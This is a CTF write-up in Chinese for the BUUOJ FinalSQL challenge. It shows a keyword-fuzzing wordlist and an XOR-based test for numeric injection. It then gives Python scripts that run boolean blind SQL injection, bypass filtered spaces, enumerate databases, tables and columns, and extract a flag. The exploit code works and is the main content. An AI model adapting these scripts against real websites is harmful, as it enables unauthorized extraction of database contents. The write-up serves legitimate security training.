[极客大挑战 2019]FinalSQL（bypass盲注）

这里是数字型注入，选择一个序号

fuzz

?id=1

这里过滤了很多东西
使用fuzzSQL字典，这是我自己定义编写的一个fuzz字典，内容较少

select
from
information
.
tables
where
=
'
and
"
or
|
&
union
columns
updatexml
extractvalue
database
table_name
column_name
schema_name
--
%25
like
||
&&
<
>
(
)
group_concat
database
OR
1%0A1
1%091
1%0C1
1%0D1
1%201
*
/
-
^
if
`
substr
mid
ascii
limit
ord
,
from
for
offset
in
length
concat

使用bp加载字典进行测试

看出被拦截的关键字相应大小为890，那么之外的就是没有被拦截的

空格被过滤了，这里使用 ^ 来计算是否为数字注入

?id=1^1
?id=1^0
?id=0^1

通过测试可以发现，除了第一个其他都执行成功，也就是说是数字型注入

也就是可以通过布尔注入来测试

?id=0^(测试语句)

如果测试语句为真那么整体返回真

那么我们的思路如下

• 得到所有数据库
• 查询指定数据库的数据表
• 查询数据表的所有字段

使用python脚本编写，如果响应为429那么就是请求过快需要等待一会再进行请求

获取所有数据库

import requests
from time import sleep
url = "http://dd9a70f3-f3ef-42bd-8286-fe0bdccac825.node4.buuoj.cn:81/search.php?id=0^({})"
# 如果为真时的关键字匹配
base = 'Click others'
# 盲注的字符集
chars = ',abcdefghijklmnopqrstuvwxyz_ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'

inject = "ord(substr((SELECT(GROUP_CONCAT(schema_name))FROM(information_schema.schemata)),{},1))={}"
for i in range(1, 1000):
    continue_ = False
    for c in chars:
        u = url.format(inject.format(i,ord(c)))
        res = requests.get(u)
        while res.status_code == 429:
            sleep(1)
            res = requests.get(u)
        if base in res.text:
            print(c,end='',flush=True)
            continue_ = True
            break
    if not continue_:
        break

information_schema,mysql,performance_schema,test,geek

获取表

inject = "ord(substr((SELECT(GROUP_CONCAT(table_name))FROM(information_schema.tables)WHERE(table_schema='geek')),{},1))={}"
for i in range(1, 1000):
    continue_ = False
    for c in chars:
        u = url.format(inject.format(i,ord(c)))
        res = requests.get(u)
        while res.status_code == 429:
            sleep(1)
            res = requests.get(u)
        if base in res.text:
            print(c,end='',flush=True)
            continue_ = True
            break
    if not continue_:
        break

F1naI1y,Flaaaaag

获取列

inject = "ord(substr((SELECT(GROUP_CONCAT(column_name))FROM(information_schema.columns)WHERE(table_name='F1naI1y')),{},1))={}"
for i in range(1, 1000):
    continue_ = False
    for c in chars:
        u = url.format(inject.format(i,ord(c)))
        res = requests.get(u)
        while res.status_code == 429:
            sleep(1)
            res = requests.get(u)
        if base in res.text:
            print(c,end='',flush=True)
            continue_ = True
            break
    if not continue_:
        break

id,username,password

获取flag

import requests
import string
from time import sleep
url = "http://9da9cb18-3096-413a-9476-8a177ffec31a.node4.buuoj.cn:81/search.php?id=0^({})"
# 如果为真时的关键字匹配
base = 'Click others'
# 盲注的字符集
chars = string.printable

inject = "ord(substr(reverse((SELECT(GROUP_CONCAT(password))FROM(geek.F1naI1y))),{},1))={}"
for i in range(1, 1000):
    continue_ = False
    for c in chars:
        u = url.format(inject.format(i,ord(c)))
        res = requests.get(u)
        while res.status_code == 429:
            sleep(1)
            res = requests.get(u)
        if base in res.text:
            print(c,end='',flush=True)
            continue_ = True
            break
    if not continue_:
        break

这里使用 reverse 是因为flag在最后面，将得到的结果反转即可得到flag

}42e24a1d9455-24bb-fac4-fdf9-e863df96{galf
flag{69fd368e-9fdf-4caf-bb42-5549d1a42e24}